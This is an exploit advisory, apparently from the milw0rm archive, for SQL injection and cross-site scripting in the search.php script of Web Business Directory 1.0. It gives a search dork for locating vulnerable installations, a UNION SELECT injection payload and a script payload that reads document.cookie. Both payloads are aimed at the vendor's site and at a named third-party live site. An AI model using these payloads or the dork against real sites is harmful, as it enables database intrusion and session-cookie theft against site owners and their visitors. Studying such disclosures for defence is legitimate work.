==============================================================================
        [Â»] [!] Coder - Developer HTML / CSS / PHP / Vb6 . [!]
==============================================================================
        [Â»] Web Business Directory 1.0 (search.php) Multiple Remote Vulnerabilities
==============================================================================

	[Â»] Script:             [ Web Business Directory 1.0 ]
	[Â»] Language:           [ PHP ]
        [Â»] Download:           [ http://www.phpdirectorysource.com/  ]
	[Â»] Founder:            [ Moudi <m0udi@9.cn> ]
        [Â»] Thanks to:          [ MiZoZ , ZuKa , str0ke , 599em Man , Security-Shell ...]
        [Â»] Team:               [ EvilWay ]
        [Â»] Dork:               [ Copyright 2005-2006 phpDirectorySourceâ„¢, all rights reserved ]
        [Â»] Price:              [ $75.00   ]
        [Â»] Site :              [ https://security-shell.ws/forum.php ]

###########################################################################

===[ Exploit SQL INJECTION + LIVE : vulnerability ]===

[Â»] http://www.site.com/patch/search.php?sa=site&sk=a&nl=11&st=

[Â»] http://www.phpdirectorysource.com/directory/search.php?sa=site&sk=a&nl=11&st=XX' union select version()/*
[Â»] http://ilovealbertaoil.com/search.php?sa=site&sk=a&nl=11&st=XX' union select version()/*

===[ Exploit XSS + LIVE : vulnerability ]===

[Â»] http://www.site.com/patch/search.php?sa=site&sk=a&nl=11&st=

[Â»] http://www.phpdirectorysource.com/directory/search.php?sa=site&sk=a&nl=11&st="><script>alert(document.cookie);</script>
[Â»] http://ilovealbertaoil.com/search.php?sa=site&sk=a&nl=11&st="><script>alert(document.cookie);</script>


Author: Moudi

###########################################################################

# milw0rm.com [2009-07-21]